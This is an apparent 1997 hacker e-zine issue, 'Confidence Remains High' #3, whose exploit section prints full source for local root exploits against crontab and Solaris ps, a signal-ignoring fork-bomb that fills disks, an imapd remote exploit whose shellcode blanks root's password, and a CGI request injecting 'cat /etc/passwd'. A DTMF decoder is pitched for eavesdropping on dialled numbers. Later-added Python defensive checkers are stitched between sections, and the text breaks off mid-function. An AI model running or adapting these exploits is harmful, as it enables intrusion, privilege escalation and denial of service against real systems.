
Confidence Remains High #3 - CodeZero Magazine


===============================================================================
.oO The CodeZero Oo.
.oO Presents Oo.
===============================================================================

-------------------------------------------------------------------------------
-C-O-N-F-i-D-E-N-C-E- -R-E-M-A-i-N-S- -H-i-G-H-

Issue 003, July 15th 1997.
-------------------------------------------------------------------------------

Are you on a w1nd0ze / D0s system?
We suggest you view this in EDIT.COM For added AsKii effects!@#

-------------------------------------------------------------------------------

_ /| k0dek4t sez...
\'o O'
=(_o_)= "EyEm HuNGaRy FoR CoDeZ,
U nOt CaTf00d!!#@"

----------------------------------
---- HTTP://WWW.CODEZ.COM ----
----------------------------------

-------------------------------------------------------------------------------
In This "Added Vitamins And Minerals" Issue :
-------------------------------------------------------------------------------

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 3....................: Tetsu Khan
2. The Future.........................................: so1o

-----=> Section B : Exploits And Code.

1. crontab b00gz......................................: unknown
2. DoS : superforker.c................................: Vio
3. Cool Bot Juarez : personal.tcl.....................: Scorn
4. imapd Remote Exploit...............................: aky / p1
5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak
6. handler CGI Hole...................................: so1o

-----=> Section C : Phones / Scanning / Radio.

1. DTMF Decoder.......................................: xFli
2. Dealing With Directory Assistance Operators........: Qytpo
3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik

-----=> Section D : Miscellaneous.

1. More sIn inf0z.....................................: The CodeZero + Friends
2. The Codez That NASA Use............................: so1o
3. Rooting From Bin...................................: so1o
4. DNS Spoofing.......................................: so1o
5. FreeNet............................................: TrN
6. Backdoors Revised..................................: Blk-Majik
7. One Last Thing About The Infamous pHf Technique....: so1o

-----=> Section E : World News.

1. Some History.......................................: nobody
2. [GUNNAR] and MadSeason and sIn.....................: so1o
3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o

------=> Section F : Projects.

1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o

-----=> Section G : The End. (+ Personal Column)

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
-------------------------------------------------------------------------------
1. Confidence Remains High Issue 3 : Tetsu Khan
-------------------------------------------------------------------------------

Because we just cannot keep the payments for www.codez.com up, and the server
keeps going up and down and up and down, Confidence Remains High and CodeZero
tools will soon be available at the following sites :

http://www.insecurity.org/codez/ [ main site, write it down :) ]
http://www.7thsphere.com/hpvac/hacking.html [ CRH distro site ]
http://www.r0ot.org [ CRH distro site ]

Also available thru FTP...

ftp.sekurity.org /users/so1o/ [ Codez distro site ]

But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next
issue or two, it will have...

CooL o-DaY WaReZ
eLeeT VMS hAx0RiN TeXt FiLeZ
K-r4d ANSi!@#

-------------------------------------------------------------------------------
2. The Future : so1o
-------------------------------------------------------------------------------

The Squirel is your friend, love the Squirel, trust the Squirel...

so1o

===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
-------------------------------------------------------------------------------
1. crontab b00gz : unknown
-------------------------------------------------------------------------------

/* crontab bug */

#include <stdio.h>
#include <stdlib.h>

long get_esp(void)
{
__asm__("movl %esp, %eax\n");
}

main(int argc, char **argv)
{
int i, j, offset;
char *bar, *foo;
unsigned long *esp_plus = NULL;

char mach_codes[] =
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

if (argc == 2)
offset = atoi(argv[1]);

bar = malloc(4096);
if (!bar){
fprintf(stderr, "failed to malloc memory\n");
exit(1);
}

foo = bar; /* copy of original ptr */

esp_plus = (long *)bar;
for(i=0; i < 1024 ; i++)
*(esp_plus++) = (get_esp() + offset);

printf("Using offset (0x%x)\n", (get_esp() + offset));

bar = (char *)esp_plus;

for(j=0; j< strlen(mach_codes); j++)
*(bar++) = mach_codes[j];

*bar = 0;

execl("/usr/bin/crontab", "crontab", foo, NULL);
}

-------------------------------------------------------------------------------
2. DoS : superforker.c : Vio
-------------------------------------------------------------------------------

This program is fucking evil; I have tested it on a few systems and it just
screws them over and sloooOOooows them right down. You can't throw anything at
the shell, it's pretty sadistic...

/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
bugtraq

This program is a beefed up classic denial of service fork()'er :)

Compilation:

on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c
on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c

on my linux, I can compile it with both -DBSD_C and -DSYSV_C

if you're not sure, you can experiment, or compile it
without any -D'efines

In the future:

SunOS signals ignored.
Creation of random symlinks for more gory destruction.
Using advanced technology coding to make the hard drive
blow up with a loud boom and the console explode causing
a nuclear meltdown.

Direct All Suggestions And Flames to: Vio

NOTE: this program is provided for educational purposes only, its author
will not take any responsibility for any stupid things you will
decide to do.

this has been tested, but not the latest version of it.
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>

#define MAX_FILELEN 100 /* The _actual_ max length */
#define MAX_DIRLEN 10

#define START_DIR "/tmp" /* This can be substituted for any directory */
/* that you have write access to */

void dirs_generator(void);

main(int argc, char *argv[])
{
int fp;
char *buff;
char chr;

unlink(argv[0]);

/* You might wanna ignore all the signals you can ignore.. */
signal(SIGINT, SIG_IGN); /* If any of the signals don't work */
signal(SIGHUP, SIG_IGN); /* on the system you are compiling */
signal(SIGTERM, SIG_IGN); /* them on, just erase that line */
signal(SIGALRM, SIG_IGN);
signal(SIGBUS, SIG_IGN);
signal(SIGFPE, SIG_IGN);
signal(SIGILL, SIG_IGN);
signal(SIGIOT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGQUIT, SIG_IGN);
signal(SIGSEGV, SIG_IGN);
signal(SIGTRAP, SIG_IGN);
signal(SIGUSR1, SIG_IGN);
signal(SIGUSR2, SIG_IGN);

#ifdef BSD_C
signal(SIGPROF, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTTOU, SIG_IGN);
signal(SIGVTALRM, SIG_IGN);
signal(SIGXCPU, SIG_IGN);
signal(SIGXFSZ, SIG_IGN);
#endif

#ifdef SYSV_C
signal(SIGPOLL, SIG_IGN);
signal(SIGPWR, SIG_IGN);
#endif

if(fork()) {
printf("Now crashing and blowing up this system.. have a nice day\n");
printf("You can safely logout, and let the proggie do its work\n");
printf("or you can stick around and watch lag go from 0 to bitch\n");
printf("in a matter of seconds\n");
printf(" --CoViN \n");
exit(0);
}
fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
if(fork()) {
while(1) {
fork();
buff = malloc(64000);
write(fp, buff, 64000);
system("uptime");
}
}
dirs_generator();
}

void dirs_generator(void)
{
char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN];
char dir[MAX_DIRLEN];
int i;
int flen;

printf("Making dirs..\n");
chdir(START_DIR);

fork(); /* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR */
fork();

while(1) {
fork();
flen= (rand() % MAX_FILELEN) - 1;
for(i=0; i<flen; i++)
fl[i] = alph[rand() % strlen(alph)];
fl[MAX_FILELEN-1]=0;
i=open(fl,O_WRONLY|O_CREAT);
write(i,"fuck you! CoViN",16);
close(i);

flen= (rand() % MAX_DIRLEN) - 1;
for(i=0; i<flen; i++)
dir[i] = alph[rand() % strlen(alph)];
dir[MAX_DIRLEN-1]=0;
mkdir(dir,0);
chdir(dir);
}
}

-------------------------------------------------------------------------------
3. Cool Bot Juarez : personal.tcl : Scorn
-------------------------------------------------------------------------------

# A simple example of using public responses to give the bot
# a personality. Send comments to SCORN ([email protected]).
# pHEARSOMe in #linuxwarez on EFnet runs this exact TCL script

# flag to turn personality on and off
set persona_flag 1

# min delay time between responses to prevent flooding
set persona_wait 10

# binds to answer questions

bind pubm - "*one*know*if*\\?*" pub_answer
bind pubm - "*one*know*how*\\?*" pub_answer
bind pubm - "*pHEARS*\\?*" pub_answer
bind pubm - "*pHEARS*bot*" pub_answer

# binds to answer greetings

bind pubm - "*re all*" pub_greet
bind pubm - "*hello all*" pub_greet
bind pubm - "*hi all*" pub_greet
bind pubm - "*sup*every*" pub_greet
bind pubm - "*sup*all*" pub_greet

# binds to answer goodbyes

bind pubm - "*cya*all" pub_bye
bind pubm - "*bbl*" pub_bye
bind pubm - "*bbia*" pub_bye
bind pubm - "*later*every*" pub_bye
bind pubm - "*bye*every*" pub_bye
bind pubm - "*ttyl*every*" pub_bye
bind pubm - "*later*all*" pub_bye
bind pubm - "*ttyl*all*" pub_bye
bind pubm - "*bye*all*" pub_bye

# binds to answer STUPID questions

bind pubm - "*one*got*site*" pub_stupid

# misc. binds

bind pubm - "*where*tk3play*" pub_tk3
bind pubm - "*url*tk3play*" pub_tk3
bind pubm - "*tk3play*where*" pub_tk3
bind pubm - "*tk3play*url*" pub_tk3
bind pubm - "*what*mp3*player*" pub_tk3
bind pubm - "*where*mp3*player*" pub_tk3

# arrays of responses

set stupid(0) "go ask for that in #linux, they might help you out there"
set stupid(1) "try ftp.linuxwarez.com!! it's got everything!!"
set stupid(2) "I got that, but I ain't givin it to you"
set stupid(3) "I tried to get that in #exceed today, but when i asked for it, it said 'cannot send o channel' but i don't want to send, i want to get!!! what am I doing wrong?"
set stupid(4) "no, but I got nekkid pics of sh00p if ya want."
set stupid(5) "no, but I got crabs, ya want some?"
set stupid(6) "I got that, I got that!!"
set stupid(7) "Talk to Trinitron, he's probably got that"
set stupid(8) "don't trade warez!!! its illegal!! you're gonna git busted!!"
set stupid(9) "I used to have that, but the fEDZ got muh warez CD and won't give it back :("
set stupid(10) "why don't yew stop leeching and start offering, ya lamah"
set stupid(11) "don't bother, it really sux. I rm -rf'd that REAL quick."
set stupid(12) "I got that, here, lemme send it over. But i'm on a 2600 baud modem."
set stupid(13) "when you get that, can you upload it to whitehouse.gov ftp site for me please?"
set stupid(14) "Linus Torvalds is giving that away, email him bout it"
set stupid(15) "I got that, but i'm only trading that for nude pics of sh00p."
set stupid(16) "I got that, but i'm only trading that for Linux for win95"
set stupid(17) "can you offer that up when ya git it? :)"
set stupid_size 18

set answer(0) "hellz yea"
set answer(1) "fuck no!"
set answer(2) "it's possible..."
set answer(3) "who cares? I shure as hell don't"
set answer(4) "I dunno, go ask in #lamer"
set answer(5) "I could tell ya, but then i'd have to kill ya."
set answer(6) "maybe"
set answer(7) "hmmm...."
set answer(8) "uh....."
set answer(9) "err...."
set answer(10) "lemme think about that one for a sec"
set answer(11) "I ain't no Answer Wizard"
set answer(12) "RTFM"
set answer(13) "nope"
set answer(14) "um, no"
set answer(15) "ya, i think so"
set answer(16) "no way"
set answer_size 17

set greets(0) "sup"
set greets(1) "yo!"
set greets(2) "oh no not you again"
set greets(3) "hey whut's up"
set greets(4) "you came in the wrong room this ain't #dogsex,"
set greets(5) "go away"
set greets(6) "well look who's here, its"
set greets(7) "hey, i hear #netsex misses you,"
set greets(8) "we missed you"
set greets(9) "oh no, yew gotta be another #oldwarez lamer, aren't you,"
set greet_size 10

set bye(0) "lata"
set bye(1) "and don't come back"
set bye(2) "cyaz"
set bye(3) "goin to #sexpics again I see...yer a perv"
set bye(4) "bye"
set bye(5) "take it easy"
set bye(6) "see ya in hell"
set bye_size 7

# general functions to answer questions randomly, has a
# delay so other more specific binds will have priority

proc pub_answer {nick uhost hand channel args} {
global persona_flag answer_nick answer_channel
if {$persona_flag} {
set answer_nick $nick
set answer_channel $channel
utimer 1 _pub_answer
}
return 0
}

proc _pub_answer {} {
global answer answer_size persona_flag answer_nick answer_channel
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $answer_channel :$answer([rand $answer_size])"
putlog "<<$answer_nick>> Persona-Answer"
return 1
}
return 0
}

# function to answer greetings

proc pub_greet {nick uhost hand channel args} {
global greets greet_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick"
putlog "<<$nick>> Persona-Greet"
return 1
}
return 0
}

# function to answer stupid stuff

proc pub_stupid {nick uhost hand channel args} {
global stupid stupid_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])"
putlog "<<$nick>> Persona-Stupid"
return 1
}
return 0
}

# function to answer goodbyes

proc pub_bye {nick uhost hand channel args} {
global bye bye_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick"
putlog "<<$nick>> Persona-Bye"
return 1
}
return 0
}

# misc. functions

proc pub_tk3 {nick uhost hand channel args} {
global persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick, check out tk3play at bleh"
putlog "<<$nick>> Persona-tk3play"
return 1
}
return 0
}

# function to enforce minimum pause between responses

proc persona_pause {} {
global persona_flag persona_wait
if {$persona_flag} {
persona_off
utimer $persona_wait persona_on
}
return 1
}

# functions to turn the personality on and off

proc persona_on {} {
global persona_flag
set persona_flag 1
return 1
}

proc persona_off {} {
global persona_flag
set persona_flag 0
return 1
}

putlog "Scorn's persona.tcl is loaded"

-------------------------------------------------------------------------------
4. imapd Remote Exploit : aky / p1
-------------------------------------------------------------------------------

This is the slightly upgraded version of this exploit floating around. There
is also another, which is very hard to get, which spawns a shell with root
access; I have also heard of European hacker groups coding homemade versions
and variants which will do this, so for the moment, here's this exploit.
imapd usually runs on port 143. This version changes the root passwd field
to being blank, so you can su to root without a password. I have heard there
are problems and limitations with this, but that ain't my problem..

/*

This is the remote exploit of the hole in the imap daemon, for
Linux. The instruction code is doing open(), write(), and close()
system calls, and it adds a line root::0:0.. at the beginning of
/etc/passwd (change to /etc/shadow if needed). The code needs to
be self modifying since imapd turns everything to lowercase before
it pushes it on the stack. The problem is that it rewrites the
first line of passwd/shadow, therefore losing the root password.
I'm sorry, but I don't have time to add in the seek syscall.

- Akylonius ([email protected]) [1997]

Modifications made on 5.1.97 to accept command line hostname, with
'h_to_ip' function that resolves it to an ip. - p1 ([email protected])

*/

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

struct hostent *h;
struct sockaddr_in tmp;
struct in_addr in;

h = gethostbyname(hostname);

if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
system("clear");
printf("\nIMAP Exploit for Linux.\n");
printf("\n\tAuthor: Akylonius ([email protected])\n");
printf(" Modifications: p1 ([email protected])\n");
}

main(int argc, char **argv) {

int fd;
struct sockaddr_in sckdaddr;
char *hostname;
char buf[4092];
int i=8;
char realegg[] =
"\xeb\x58\x5e"
"\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
"\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
"\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
"\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
"\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
"\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
"\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"\xe8\x83\xff\xff\xff"
"/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
char *point = realegg;
buf[0]='*';
buf[1]=' ';
buf[2]='l';
buf[3]='o';
buf[4]='g';
buf[5]='i';
buf[6]='n';
buf[7]=' ';

banner();

if (argc<2) {
printf("\nUsage: %s <hostname>\n\n", argv[0]);
exit(-1);
}

hostname=argv[1];

while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
buf[i++]=0x90;

while(*point)
buf[i++]=*(point++);

buf[i++]=0x83; /* ebp */
buf[i++]=0xf3;
buf[i++]=0xff;
buf[i++]=0xbf;
buf[i++]=0x88; /* ret adr */
buf[i++]=0xf8;
buf[i++]=0xff;
buf[i++]=0xbf;

buf[i++]=' ';
buf[i++]='b';
buf[i++]='a';
buf[i++]='h';
buf[i++]='\n';

buf[i++]=0x0;

if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n");

sckdaddr.sin_port=htons(143);
sckdaddr.sin_family=AF_INET;
sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting \n");

printf("hmm: \n");
getchar();
write(fd,buf,strlen(buf)+1);
printf("hmm: \n");
close(fd);
}
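The whole effect of the payload above is one rewritten line in /etc/passwd: a uid-0 entry with an empty password field where the real root line used to be. As an added example (not the zine's or the exploit authors' code), here is the host-side check that would catch it: per-entry sanity rules over a passwd image, plus a comparison against a trusted baseline copy. Both passwd images below are constructed.

```python
"""Audit an /etc/passwd image for the damage the imapd payload above does.

Added example, not part of the original zine. BASELINE and COMPROMISED are
constructed; line 1 of COMPROMISED is the string the shellcode writes.
"""

REQUIRED_FIELDS = 7   # name:passwd:uid:gid:gecos:home:shell

def parse_passwd(text):
    """Map line number -> field list for a passwd image; malformed lines map to None."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            fields = line.split(":")
            entries[lineno] = fields if len(fields) == REQUIRED_FIELDS else None
    return entries

def audit_passwd(text):
    """Per-entry checks: empty password, extra uid-0 accounts, duplicates, junk."""
    findings, seen = [], {}
    for lineno, fields in parse_passwd(text).items():
        if fields is None:
            findings.append((lineno, "malformed entry (expected 7 colon-separated fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((lineno, f"non-numeric uid/gid for {name!r}"))
            continue
        if pw == "":
            # No hash and no 'x' pointer to shadow: anyone can log in as this user.
            findings.append((lineno, f"empty password field for {name!r}"))
        if uid == "0" and name != "root":
            findings.append((lineno, f"extra uid-0 account {name!r}"))
        if name in seen:
            findings.append((lineno, f"duplicate user {name!r}, first seen on line {seen[name]}"))
        else:
            seen[name] = lineno
    return findings

def diff_against_baseline(baseline, current):
    """Users whose entry changed, vanished or appeared relative to a trusted copy.

    Catches the overwrite even when the replacement line would pass the
    per-entry checks (for example if a real hash had been supplied).
    """
    def by_name(text):
        return {f[0]: f for f in parse_passwd(text).values() if f}
    old, new = by_name(baseline), by_name(current)
    changes = [(n, "removed") for n in old if n not in new]
    changes += [(n, "changed") for n in old if n in new and new[n] != old[n]]
    changes += [(n, "added") for n in new if n not in old]
    return sorted(changes)

# Constructed images of a shadowed system ('x' in the password field). The
# original root line has been replaced, exactly as the comment above describes.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
so1o:x:500:100:so1o:/home/so1o:/bin/bash
"""

COMPROMISED = """\
root::0:0:r00t:/:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
so1o:x:500:100:so1o:/home/so1o:/bin/bash
"""

if __name__ == "__main__":
    for lineno, reason in audit_passwd(COMPROMISED):
        print(f"line {lineno}: {reason}")
    for user, what in diff_against_baseline(BASELINE, COMPROMISED):
        print(f"{user}: {what}")
```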

-------------------------------------------------------------------------------
5. Solaris 2.5.1 ps Exploit : J. Zbiciak
-------------------------------------------------------------------------------

#!/bin/sh
#
# Exploit for Solaris 2.5.1 /usr/bin/ps
# J. Zbiciak, 5/18/97
#
# Just copy this into one file, upload it to a system, chmod 755 <file> and
# then run it using <file>

# change as appropriate
CC=gcc

# Build the "replacement message" :-)
cat > ps_expl.po << E_O_F
domain "SUNW_OST_OSCMD"
msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\02\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
E_O_F

msgfmt -o /tmp/foo ps_expl.po

# Build the C portion of the exploit
cat > ps_expl.c << E_O_F

/*****************************************/
/* Exploit for Solaris 2.5.1 /usr/bin/ps */
/* J. Zbiciak, 5/18/97 */
/*****************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH (632)
#define EXTRA (256)

int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
/* ps will grok this file for the exploit code */
char *envp[]={"NLSPATH=/tmp/foo",0};
u_long *long_p;
u_char *char_p;
/* This will vary depending on your libc */
u_long proc_link=0xef70ef70;
int i;

long_p = (u_long *) buf;

/* This first loop smashes the target buffer for optargs */
for (i = 0; i < (96) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* At offset 96 is the environ ptr -- be careful not to mess it up */
*long_p++=0xeffffcb0;
*long_p++=0xffffffff;

/* After that is the _ctype table. Filling with 0x10101010 marks the
entire character set as being "uppercase printable". */
for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */
/* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */

/* build up _iob[1] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */

/* build up _iob[2] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */

*long_p =0;

/* The following includes the invalid argument '-z' to force the
usage msg to appear after the arguments have been parsed. */
execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
perror("execle failed");

return 0;
}
E_O_F

# Compile it
$CC -o ps_expl ps_expl.c

# And off we go!
exec ./ps_expl

-------------------------------------------------------------------------------
6. handler CGI Hole : so1o
-------------------------------------------------------------------------------

New bug that affects most IRIX systems, here's how you use it...

telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
HTTP/1.0
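The tell in the request above is shell metacharacters (and a raw space) inside the path handed to the handler CGI. As an added example, not part of the zine, the following scans web server access-log lines in Common Log Format for exactly that, percent-decoding first so an encoded `%3B` or `%7C` is caught too. The log lines are constructed; the CGI prefix is a parameter.

```python
"""Flag handler-style CGI command injection in web access logs.

Added example, not part of the original zine. SAMPLE_LOG is constructed; the
first line mirrors the request shown above.
"""
import re
from urllib.parse import unquote

# Common Log Format: host ident authuser [time] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Characters that let a CGI argument escape into a shell command line.
SHELL_META = set(";|`$&")

def split_request(request):
    """Split 'METHOD target [HTTP/x.y]' without assuming the target has no spaces.

    Injected commands usually contain spaces ('cat /etc/passwd'), so only the
    first token and a trailing HTTP/ token are treated as method and protocol.
    """
    parts = request.split(" ")
    method = parts[0]
    if len(parts) > 2 and parts[-1].startswith("HTTP/"):
        return method, " ".join(parts[1:-1]), parts[-1]
    return method, " ".join(parts[1:]), ""

def is_cgi_injection(target, cgi_prefix="/cgi-bin/handler"):
    """True when a request under cgi_prefix carries shell metacharacters in its path."""
    decoded = unquote(target)
    if not decoded.startswith(cgi_prefix):
        return False
    path = decoded.split("?", 1)[0]
    # A legitimate handler URL has neither metacharacters nor whitespace in
    # the path component; the query string is deliberately left out.
    return any(c in SHELL_META or c.isspace() for c in path)

def scan_access_log(lines):
    """Return (host, time, target) for each suspicious handler request."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        _, target, _ = split_request(m["request"])
        if is_cgi_injection(target):
            hits.append((m["host"], m["time"], target))
    return hits

# Constructed sample: the request from above, the same attack percent-encoded,
# a benign handler download, and an unrelated page fetch.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/1997:02:14:08 +0000] "GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0" 200 1422',
    '192.0.2.10 - - [15/Jul/1997:02:15:31 +0000] "GET /cgi-bin/handler/x%3Bid%7C?data=Download HTTP/1.0" 200 88',
    '192.0.2.20 - - [15/Jul/1997:02:16:02 +0000] "GET /cgi-bin/handler/docs/readme.txt?data=Download HTTP/1.0" 200 5120',
    '192.0.2.30 - - [15/Jul/1997:02:17:45 +0000] "GET /index.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for host, when, target in scan_access_log(SAMPLE_LOG):
        print(f"{when} {host} -> {target}")
```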

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
-------------------------------------------------------------------------------
1. DTMF Decoder : xFli
-------------------------------------------------------------------------------

DTMF Decoder plans.
-------------------

If you are into big-time surveillance, or you just have some burning desire
to get the phone number of your sister's sexy friend, then you will be
interested in this little circuit. Basically, using this, you can use a tape
recorder and a pickup coil to record the DTMF tones sent when someone dials
a number and then decode them to get the number dialled, or, if it is easier,
you can wire it up to a phone jack and decode in real time. This
can cope with speed dialling, but you will need a reasonably good recording
to decode successfully.

The circuit is simplicity itself, literally only 5 components. I could have
included an unreadable ASCII circuit diagram / PCB layout, but it would have been
a waste of time, so the diagrams are available from http://www.codez.com and other
CodeZero sites.

The hardware takes the DTMF signal, decodes it and sends it to LPT1, where the
binary output of the IC is converted into standard numbers. The simple BASIC
program is included; a precompiled version is on http://www.codez.com.

Component list:
----------------

1 x SSI202 18 pin Chip
1 x 3.579 MHz quartz crystal
2 x 27n Capacitors
1 x 1M resistor

Source:
--------

DTMF DECODER SOFTWARE
------------------------------------------

' Use this to decode the output from the decoder hardware
' Not written by xFli, suggested in an electronics mag.
' Port &H279 is the printer status register: bits 3-6 carry the SSI202
' tone code, bit 7 (the inverted BUSY line) reads 0 while a tone is present.
' Each wait loop re-reads the port; as originally listed, lines 30, 180
' and 220 tested a stale value of I and could never exit.

10 CLS:KEY OFF
20 I=INP(&H279)
30 I=INP(&H279):IF (I AND 128)=128 THEN 30   ' wait for a tone to start
40 C=0
50 IF (I AND 8)=8 THEN C=C+1                 ' assemble the 4-bit code
60 IF (I AND 16)=16 THEN C=C+2
70 IF (I AND 32)=32 THEN C=C+4
80 IF (I AND 64)=64 THEN C=C+8
90 IF C=11 THEN PRINT" * ";:GOTO 180
100 IF C=12 THEN PRINT" # ";:GOTO 180
110 IF C=13 THEN PRINT" A ";:GOTO 180
120 IF C=14 THEN PRINT" B ";:GOTO 180
130 IF C=15 THEN PRINT" C ";:GOTO 180
140 IF C=0 THEN PRINT" D ";:GOTO 180
150 IF C=10 THEN PRINT" 0 ";:GOTO 180
160 PRINT C;
180 I=INP(&H279):IF (I AND 128)=0 THEN 180   ' wait for the tone to end
190 T=TIMER
200 I=INP(&H279)
210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30  ' 5 s of silence = new number
220 IF (I AND 128)=128 THEN 200              ' still silent, keep polling
230 GOTO 50

In the magazine, it is advised you use GW-BASIC, which is included with very
early DOS versions. It may or may not work with QBasic etc., I don't know.
These are also for UK tones; maybe they are different in the US.
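The BASIC listing can only be checked with the hardware attached. As an added example, not from the zine or the magazine it cites, here is the same decode logic in Python so it can be checked offline: it takes timestamped status-port bytes, assumes the bit layout the listing uses (tone code in bits 3..6, inverted BUSY on bit 7 as data-valid), emits a symbol on each tone onset, and splits numbers on the same 5-second silence. The sample stream is constructed.

```python
"""Decode SSI202 tone codes read through a PC parallel-port status register.

Added example, not part of the original zine; a Python re-implementation of
the GW-BASIC listing above, checkable against a constructed sample stream.
"""

DV_MASK = 0x80      # bit 7: reads 0 while a tone is present (BUSY is inverted)
CODE_SHIFT = 3      # bits 3..6 carry the SSI202 outputs D1..D4
GAP_SECONDS = 5.0   # silence longer than this starts a new number

# SSI202 output code -> keypad symbol, as the BASIC IF chain maps them
SYMBOLS = {**{c: str(c) for c in range(1, 10)},
           10: "0", 11: "*", 12: "#", 13: "A", 14: "B", 15: "C", 0: "D"}

def tone_present(status):
    """Data-valid is asserted when the inverted BUSY bit reads 0."""
    return (status & DV_MASK) == 0

def decode_code(status):
    """Extract the 4-bit tone code from bits 3..6 and map it to a symbol."""
    return SYMBOLS[(status >> CODE_SHIFT) & 0x0F]

def decode_samples(samples):
    """Turn (time, status_byte) samples into the dialled strings.

    A symbol is emitted on each tone onset (bit 7 falling to 0). A quiet gap of
    more than GAP_SECONDS before the next onset closes the current number,
    which is what the TIMER test on line 210 of the listing does.
    """
    numbers, current = [], ""
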